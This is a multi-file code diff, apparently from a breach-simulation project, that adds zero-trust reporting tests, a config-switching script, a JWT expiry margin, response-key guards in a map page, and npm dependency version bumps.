Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
# devices unexecuted = 1
# people verify = 1
# networks verify = 1
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
# people verify = 2
# networks verify = 2
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
# data failed 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 2
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 3
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 4
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 5
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data verify 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
# data verify 2
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
# data passed 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
class TestZeroTrustService(IslandTestCase):
def test_get_pillars_grades(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
save_example_findings()
expected = [
{
STATUS_FAILED: 5,
STATUS_VERIFY: 2,
STATUS_PASSED: 1,
STATUS_UNEXECUTED: 1,
"pillar": "Data"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 2,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 1,
"pillar": "People"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 2,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 4,
"pillar": "Networks"
},
{
STATUS_FAILED: 1,
STATUS_VERIFY: 0,
STATUS_PASSED: 2,
STATUS_UNEXECUTED: 1,
"pillar": "Devices"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 0,
"pillar": "Workloads"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 3,
"pillar": "Visibility & Analytics"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 0,
"pillar": "Automation & Orchestration"
}
]
result = ZeroTrustService.get_pillars_grades()
self.assertEqual(result, expected)
def test_get_principles_status(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
self.maxDiff = None
save_example_findings()
expected = dict(EXPECTED_DICT) # new mutable
result = ZeroTrustService.get_principles_status()
# Compare expected and result, no order:
for pillar_name, pillar_principles_status_result in result.items():
for index, pillar_principle_status_expected in enumerate(expected.get(pillar_name)):
correct_one = None
for pillar_principle_status_result in pillar_principles_status_result:
if pillar_principle_status_result["principle"] == pillar_principle_status_expected["principle"]:
correct_one = pillar_principle_status_result
break
# Compare tests no order
self.assertTrue(compare_lists_no_order(correct_one["tests"], pillar_principle_status_expected["tests"]))
# Compare the rest
del pillar_principle_status_expected["tests"]
del correct_one["tests"]
self.assertEqual(sorted(correct_one), sorted(pillar_principle_status_expected))
def test_get_pillars_to_statuses(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
@ -283,3 +298,13 @@ class TestZeroTrustService(IslandTestCase):
}
self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected)
def compare_lists_no_order(s, t):
t = list(t) # make a mutable copy
try:
for elem in s:
t.remove(elem)
except ValueError:
return False
return not t

View File

@ -0,0 +1,46 @@
import argparse
import json
import logging
from pathlib import Path
SERVER_CONFIG = "server_config"
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
def main():
args = parse_args()
file_path = get_config_file_path(args)
# Read config
with open(file_path) as config_file:
config_data = json.load(config_file)
# Edit the config
config_data[SERVER_CONFIG] = args.server_config
# Write new config
logger.info("Writing the following config: {}".format(json.dumps(config_data, indent=4)))
with open(file_path, "w") as config_file:
json.dump(config_data, config_file, indent=4)
config_file.write("\n") # Have to add newline at end of file, since json.dump does not.
def get_config_file_path(args):
file_path = Path(__file__).parent.joinpath(args.file_name)
logger.info("Config file path: {}".format(file_path))
return file_path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("server_config", choices=["standard", "testing", "password"])
parser.add_argument("-f", "--file_name", required=False, default="server_config.json")
args = parser.parse_args()
return args
if __name__ == '__main__':
main()

View File

@ -737,9 +737,9 @@
"integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE="
},
"process-nextick-args": {
"version": "2.0.0",
"resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.0.tgz",
"integrity": "sha512-MtEC1TqN0EU5nephaJ4rAtThHtC86dNN9qCuEhtshvpVBkAW5ZO7BASN9REnF9eoXGcRub+pFuKEpOHE+HbEMw=="
"version": "2.0.1",
"resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz",
"integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag=="
},
"readable-stream": {
"version": "2.3.6",
@ -749,7 +749,7 @@
"core-util-is": "1.0.2",
"inherits": "2.0.3",
"isarray": "1.0.0",
"process-nextick-args": "2.0.0",
"process-nextick-args": "2.0.1",
"safe-buffer": "5.1.1",
"string_decoder": "1.1.1",
"util-deprecate": "1.0.2"
@ -5652,9 +5652,9 @@
"optional": true
},
"filepond": {
"version": "4.7.2",
"resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz",
"integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA=="
"version": "4.7.3",
"resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.3.tgz",
"integrity": "sha512-lt7UC2wwuoy1WN0zTeZRZ+jS9tHgICPYJB8l1OtHdCjGwaQzTq+M3PqKQQ7melKkGS1tQ1rUInKkSdSuojphWg=="
},
"fill-range": {
"version": "2.2.3",
@ -6288,8 +6288,8 @@
"dev": true,
"optional": true,
"requires": {
"co": "^4.6.0",
"json-stable-stringify": "^1.0.1"
"co": "4.6.0",
"json-stable-stringify": "1.0.1"
}
},
"ansi-regex": {
@ -6606,8 +6606,8 @@
"dev": true,
"optional": true,
"requires": {
"ajv": "^4.9.1",
"har-schema": "^1.0.5"
"ajv": "4.11.8",
"har-schema": "1.0.5"
}
},
"has-unicode": {
@ -10953,9 +10953,9 @@
},
"dependencies": {
"ajv": {
"version": "6.10.0",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.10.0.tgz",
"integrity": "sha512-nffhOpkymDECQyR0mnsUtoCE8RlX38G0rYP+wgLWFyZuUyuuojSSvi/+euOiQBIn63whYwYVIIH1TvE3tu4OEg==",
"version": "6.10.2",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.10.2.tgz",
"integrity": "sha512-TXtUUEYHuaTEbLZWIKUr5pmBuhDLy+8KYtPYdcV8qC+pOZL+NKqYwvWSRrVXHn+ZmRRAu8vJTAznH7Oag6RVRw==",
"requires": {
"fast-deep-equal": "2.0.1",
"fast-json-stable-stringify": "2.0.0",
@ -10983,7 +10983,7 @@
"resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.3.tgz",
"integrity": "sha512-sNvOCzEQNr/qrvJgc3UG/kD4QtlHycrzwS+6mfTrrSq97BvaYcPZZI1ZSqGSPR73Cxn4LKTD4PttRwfU7jWq5g==",
"requires": {
"ajv": "6.10.0",
"ajv": "6.10.2",
"har-schema": "2.0.0"
}
},
@ -11011,9 +11011,9 @@
"integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ=="
},
"psl": {
"version": "1.1.32",
"resolved": "https://registry.npmjs.org/psl/-/psl-1.1.32.tgz",
"integrity": "sha512-MHACAkHpihU/REGGPLj4sEfc/XKW2bheigvHO1dUqjaKigMp1C8+WLQYRGgeKFMsw5PMfegZcaN8IDXK/cD0+g=="
"version": "1.4.0",
"resolved": "https://registry.npmjs.org/psl/-/psl-1.4.0.tgz",
"integrity": "sha512-HZzqCGPecFLyoRj5HLfuDSKYTJkAfB5thKBIkRHtGjWwY7p1dAyveIbXIq4tO0KYfDF2tHqPUgY9SDnGm00uFw=="
},
"request": {
"version": "2.88.0",
@ -11036,16 +11036,16 @@
"oauth-sign": "0.9.0",
"performance-now": "2.1.0",
"qs": "6.5.2",
"safe-buffer": "5.1.2",
"safe-buffer": "5.2.0",
"tough-cookie": "2.4.3",
"tunnel-agent": "0.6.0",
"uuid": "3.3.2"
"uuid": "3.3.3"
}
},
"safe-buffer": {
"version": "5.1.2",
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz",
"integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="
"version": "5.2.0",
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.0.tgz",
"integrity": "sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg=="
},
"semver": {
"version": "5.3.0",
@ -11057,14 +11057,14 @@
"resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.4.3.tgz",
"integrity": "sha512-Q5srk/4vDM54WJsJio3XNn6K2sCG+CQ8G5Wz6bZhRZoAe/+TxjWB/GlFAnYEbkYVlON9FMk/fE3h2RLpPXo4lQ==",
"requires": {
"psl": "1.1.32",
"psl": "1.4.0",
"punycode": "1.4.1"
}
},
"uuid": {
"version": "3.3.2",
"resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.2.tgz",
"integrity": "sha512-yXJmeNaw3DnnKAOKJE51sL/ZaYfWJRl1pK9dr19YFCu0ObS231AB1/LbqTKRAQ5kw8A90rA6fr4riOUpTZvQZA=="
"version": "3.3.3",
"resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.3.tgz",
"integrity": "sha512-pW0No1RGHgzlpHJO1nsVrHKpOEIxkGg1xB+v0ZmdNH5OAeAwzAVrCnI2/6Mtx+Uys6iaylxa+D3g4j63IKKjSQ=="
}
}
},
@ -11168,9 +11168,9 @@
}
},
"node-sass": {
"version": "4.12.0",
"resolved": "https://registry.npmjs.org/node-sass/-/node-sass-4.12.0.tgz",
"integrity": "sha512-A1Iv4oN+Iel6EPv77/HddXErL2a+gZ4uBeZUy+a8O35CFYTXhgA8MgLCWBtwpGZdCvTvQ9d+bQxX/QC36GDPpQ==",
"version": "4.13.0",
"resolved": "https://registry.npmjs.org/node-sass/-/node-sass-4.13.0.tgz",
"integrity": "sha512-W1XBrvoJ1dy7VsvTAS5q1V45lREbTlZQqFbiHb3R3OTTCma0XBtuG6xZ6Z4506nR4lmHPTqVRwxT6KgtWC97CA==",
"requires": {
"async-foreach": "0.1.3",
"chalk": "1.1.3",
@ -11179,7 +11179,7 @@
"get-stdin": "4.0.1",
"glob": "7.1.4",
"in-publish": "2.0.0",
"lodash": "4.17.11",
"lodash": "4.17.15",
"meow": "3.7.0",
"mkdirp": "0.5.1",
"nan": "2.14.0",
@ -11192,9 +11192,9 @@
},
"dependencies": {
"ajv": {
"version": "6.10.0",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.10.0.tgz",
"integrity": "sha512-nffhOpkymDECQyR0mnsUtoCE8RlX38G0rYP+wgLWFyZuUyuuojSSvi/+euOiQBIn63whYwYVIIH1TvE3tu4OEg==",
"version": "6.10.2",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.10.2.tgz",
"integrity": "sha512-TXtUUEYHuaTEbLZWIKUr5pmBuhDLy+8KYtPYdcV8qC+pOZL+NKqYwvWSRrVXHn+ZmRRAu8vJTAznH7Oag6RVRw==",
"requires": {
"fast-deep-equal": "2.0.1",
"fast-json-stable-stringify": "2.0.0",
@ -11231,7 +11231,7 @@
"resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.3.tgz",
"integrity": "sha512-sNvOCzEQNr/qrvJgc3UG/kD4QtlHycrzwS+6mfTrrSq97BvaYcPZZI1ZSqGSPR73Cxn4LKTD4PttRwfU7jWq5g==",
"requires": {
"ajv": "6.10.0",
"ajv": "6.10.2",
"har-schema": "2.0.0"
}
},
@ -11241,9 +11241,9 @@
"integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg=="
},
"lodash": {
"version": "4.17.11",
"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.11.tgz",
"integrity": "sha512-cQKh8igo5QUhZ7lg38DYWAxMvjSAKG0A8wGSVimP07SIUEK2UO+arSRKbRZWtelMtN5V0Hkwh5ryOto/SshYIg=="
"version": "4.17.15",
"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz",
"integrity": "sha512-8xOcRHvCjnocdS5cpwXQXVzmmh5e5+saE2QGoeQmbKmRS6J3VQppPOIt0MnmE+4xlZoumy0GPG0D0MVIQbNA1A=="
},
"mime-db": {
"version": "1.40.0",
@ -11269,9 +11269,9 @@
"integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ=="
},
"psl": {
"version": "1.1.32",
"resolved": "https://registry.npmjs.org/psl/-/psl-1.1.32.tgz",
"integrity": "sha512-MHACAkHpihU/REGGPLj4sEfc/XKW2bheigvHO1dUqjaKigMp1C8+WLQYRGgeKFMsw5PMfegZcaN8IDXK/cD0+g=="
"version": "1.4.0",
"resolved": "https://registry.npmjs.org/psl/-/psl-1.4.0.tgz",
"integrity": "sha512-HZzqCGPecFLyoRj5HLfuDSKYTJkAfB5thKBIkRHtGjWwY7p1dAyveIbXIq4tO0KYfDF2tHqPUgY9SDnGm00uFw=="
},
"request": {
"version": "2.88.0",
@ -11294,30 +11294,30 @@
"oauth-sign": "0.9.0",
"performance-now": "2.1.0",
"qs": "6.5.2",
"safe-buffer": "5.1.2",
"safe-buffer": "5.2.0",
"tough-cookie": "2.4.3",
"tunnel-agent": "0.6.0",
"uuid": "3.3.2"
"uuid": "3.3.3"
}
},
"safe-buffer": {
"version": "5.1.2",
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz",
"integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="
"version": "5.2.0",
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.0.tgz",
"integrity": "sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg=="
},
"tough-cookie": {
"version": "2.4.3",
"resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.4.3.tgz",
"integrity": "sha512-Q5srk/4vDM54WJsJio3XNn6K2sCG+CQ8G5Wz6bZhRZoAe/+TxjWB/GlFAnYEbkYVlON9FMk/fE3h2RLpPXo4lQ==",
"requires": {
"psl": "1.1.32",
"psl": "1.4.0",
"punycode": "1.4.1"
}
},
"uuid": {
"version": "3.3.2",
"resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.2.tgz",
"integrity": "sha512-yXJmeNaw3DnnKAOKJE51sL/ZaYfWJRl1pK9dr19YFCu0ObS231AB1/LbqTKRAQ5kw8A90rA6fr4riOUpTZvQZA=="
"version": "3.3.3",
"resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.3.tgz",
"integrity": "sha512-pW0No1RGHgzlpHJO1nsVrHKpOEIxkGg1xB+v0ZmdNH5OAeAwzAVrCnI2/6Mtx+Uys6iaylxa+D3g4j63IKKjSQ=="
}
}
},
@ -17543,9 +17543,9 @@
"integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE="
},
"process-nextick-args": {
"version": "2.0.0",
"resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.0.tgz",
"integrity": "sha512-MtEC1TqN0EU5nephaJ4rAtThHtC86dNN9qCuEhtshvpVBkAW5ZO7BASN9REnF9eoXGcRub+pFuKEpOHE+HbEMw=="
"version": "2.0.1",
"resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz",
"integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag=="
},
"readable-stream": {
"version": "2.3.6",
@ -17555,7 +17555,7 @@
"core-util-is": "1.0.2",
"inherits": "2.0.3",
"isarray": "1.0.0",
"process-nextick-args": "2.0.0",
"process-nextick-args": "2.0.1",
"safe-buffer": "5.1.1",
"string_decoder": "1.1.1",
"util-deprecate": "1.0.2"

View File

@ -74,12 +74,12 @@
"downloadjs": "^1.4.7",
"fetch": "^1.1.0",
"file-saver": "^2.0.2",
"filepond": "^4.7.2",
"filepond": "^4.7.3",
"js-file-download": "^0.4.8",
"json-loader": "^0.5.7",
"jwt-decode": "^2.2.0",
"moment": "^2.24.0",
"node-sass": "^4.11.0",
"node-sass": "^4.13.0",
"normalize.css": "^8.0.0",
"npm": "^6.11.3",
"pluralize": "^7.0.0",

View File

@ -43,11 +43,13 @@ class MapPageComponent extends AuthComponent {
this.authFetch('/api/netmap')
.then(res => res.json())
.then(res => {
if (res.hasOwnProperty("edges")) {
res.edges.forEach(edge => {
edge.color = {'color': edgeGroupToColor(edge.group)};
});
this.setState({graph: res});
this.props.onStatusChange();
}
});
};
@ -55,6 +57,7 @@ class MapPageComponent extends AuthComponent {
this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp)
.then(res => res.json())
.then(res => {
if ('telemetries' in res) {
let newTelem = this.state.telemetry.concat(res['telemetries']);
this.setState(
@ -63,6 +66,7 @@ class MapPageComponent extends AuthComponent {
telemetryLastTimestamp: res['timestamp']
});
this.props.onStatusChange();
}
});
};

View File

@ -7,6 +7,8 @@ export default class AuthService {
"55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062" +
"8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557";
SECONDS_BEFORE_JWT_EXPIRES = 20;
login = (username, password) => {
return this._login(username, this.hashSha3(password));
};
@ -96,7 +98,7 @@ export default class AuthService {
_isTokenExpired(token) {
try {
return decode(token)['exp'] < Date.now() / 1000;
return decode(token)['exp'] - this.SECONDS_BEFORE_JWT_EXPIRES < Date.now() / 1000;
}
catch (err) {
return false;

View File

@ -1,3 +1,5 @@
pytest
bson
python-dateutil
tornado
werkzeug

6
monkey/pytest.ini Normal file
View File

@ -0,0 +1,6 @@
[pytest]
log_cli = 1
log_cli_level = DEBUG
log_cli_format = %(asctime)s [%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s
log_cli_date_format=%H:%M:%S
addopts = -v --capture=sys